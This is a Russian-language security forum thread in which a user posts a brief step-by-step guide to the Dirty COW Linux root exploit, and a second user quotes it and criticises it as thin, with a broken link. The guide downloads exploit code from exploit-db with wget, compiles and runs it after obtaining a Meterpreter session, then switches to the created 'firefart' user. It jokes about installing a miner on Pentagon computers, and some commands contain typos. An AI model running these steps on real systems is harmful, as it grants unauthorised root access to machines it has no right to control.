• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Dirty или как просто рутануться

NeskO

Green Team
10.01.2018
115
52
BIT
2
Несквик вернулся
Недавно после получения сессии меты, я пошель в шел(Бубунты) и рута не получил и тут я вспоминаю про Dirty довольно старый експлоит...
Но на мое удивление сработал, ну и я подумал написать че нить для новичков.
Итак:
Для начала скачаем екплоит с помошью вджета:
Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
Переименуем и покомпилируем эту вещь:
Код:
gcc -pthread dirty.c -o dirty –lcrypt
Терь ОЧЕНЬ ВАЖНО: начинаем злобно смеяться и запускаем екплоит:
Код:
./dirthy
После этого меняем пОрОль ток что созданого пользователь firefart, меняем пользователя на файра и набираем
Код:
su
Набираем наш пароль и ставим майнер на компы Пентагона!
 

pr0phet

Platinum
02.04.2018
358
496
BIT
9
Несквик вернулся
Недавно после получения сессии меты, я пошель в шел(Бубунты) и рута не получил и тут я вспоминаю про Dirty довольно старый експлоит...
Но на мое удивление сработал, ну и я подумал написать че нить для новичков.
Итак:
Для начала скачаем екплоит с помошью вджета:
Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
Переименуем и покомпилируем эту вещь:
Код:
gcc -pthread dirty.c -o dirty –lcrypt
Терь ОЧЕНЬ ВАЖНО: начинаем злобно смеяться и запускаем екплоит:
Код:
./dirthy
После этого меняем пОрОль ток что созданого пользователь firefart, меняем пользователя на файра и набираем
Код:
su
Набираем наш пароль и ставим майнер на компы Пентагона!

1. На каком ядре то хоть запускал поведай.
2. Ссылка битая на сплойт
3. На статью это вообще не тянет
4. @Vander это уже описывал с пруфами, ссылками и описанием уязвимости Dirty Cow Exploit - Codeby.net - Информационная Безопасность
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!